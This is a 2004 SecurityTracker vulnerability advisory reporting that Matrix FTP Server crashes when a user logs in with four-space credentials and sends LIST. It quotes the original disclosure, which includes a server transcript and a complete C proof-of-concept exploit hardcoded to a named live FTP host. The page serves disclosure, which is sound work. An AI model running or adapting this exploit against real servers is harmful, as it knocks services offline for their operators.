SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (File Transfer/Sharing)  >   Matrix FTP Server Vendors:   Matrix Servers
Matrix FTP Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008970
SecurityTracker URL:  http://securitytracker.com/id/1008970
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 6 2004
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   ATmaCA reported a vulnerability in the Matrix FTP Server. A remote user can cause the FTP service to crash.

It is reported that a remote user can login with a special username and password (four spaces for the username, and four spaces for the password) and then send the FTP LIST command to the target server to cause the FTP service to crash.

A demonstration exploit is provided in the Source Message.

Impact:   A remote user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.matrix-servers.com/index.html (Links to External Site)
Cause:   Exception handling error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Thu, 05 Feb 2004 18:13:32 +0000
Subject:  "Matrix FTP Server" may be crashed after logining send LIST command.


Application:  Matrix FTP server
              http://fasthost.co.uk/indexa_02_matrix.html

Bug:          Denial Of Service

Author:       ATmaCA
              e-mail: atmaca@prohack.net
              web: http://www.prohack.net


--The bug:
Matrix FTP Server may be crashed after logining send LIST command.

To test the vulnerability simply login ftp server
"USER    \r\n" (USER [    ]) 4space
"PASS    \r\n" (PASS [    ]) 4space

after logining send the LIST command to the server

-----------------------------------------------------------------------
220 Matrix FTP server (Server WLB#4) ready.
USER
331 User name okay, need password.
PASS
230 User logged in, proceed.
LIST
550 Access violation at address 0048FCC1 in module 'MatrixFTPServerSvc.exe'.
Write of address 00000030
-----------------------------------------------------------------------

and the ftp server may be crashed.


--The fix:
Not exist.

//===========================================================
#include <winsock2.h>
#include "stdio.h"
#include "conio.h"

#pragma comment(lib, "ws2_32.lib")

void main()
{
        WSADATA W;
        SOCKET Sock;
        struct sockaddr_in Saddr;
        int res,err;

        char text[1024]={' '};
        err = WSAStartup( 0x101, &W );
        if(err!=0) return;
	Sock=socket(AF_INET,SOCK_STREAM,0);
	Saddr.sin_family=AF_INET;
	Saddr.sin_port=htons(21);
	hostent *H=gethostbyname("ftp.fasthost.co.uk");
	Saddr.sin_addr.s_addr= *((unsigned long *) H->h_addr);
	printf("Connecting to server..\n");
	res=connect(Sock,(sockaddr*)&Saddr,sizeof(Saddr));
	if (res!=0) return;

    	res=recv(Sock,text,1024,0);
        printf(text);

    	strcpy(text,"USER    \r\n");
      	res=send(Sock,text,strlen(text),0);
		printf(text);

    	res=recv(Sock,text,1024,0);
        printf(text);

        strcpy(text,"PASS    \r\n");
    	res=send(Sock,text,strlen(text),0);
		printf(text);

        res=recv(Sock,text,1024,0);
        printf(text);

        strcpy(text,"LIST\r\n");
    	res=send(Sock,text,strlen(text),0);
		printf(text);

        res=recv(Sock,text,1024,0);
        printf(text);

	    closesocket(Sock);

return;
}
//==========================================================

_________________________________________________________________
Help STOP SPAM with the new MSN 8 and get 2 months FREE*
http://join.msn.com/?page=features/junkmail



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC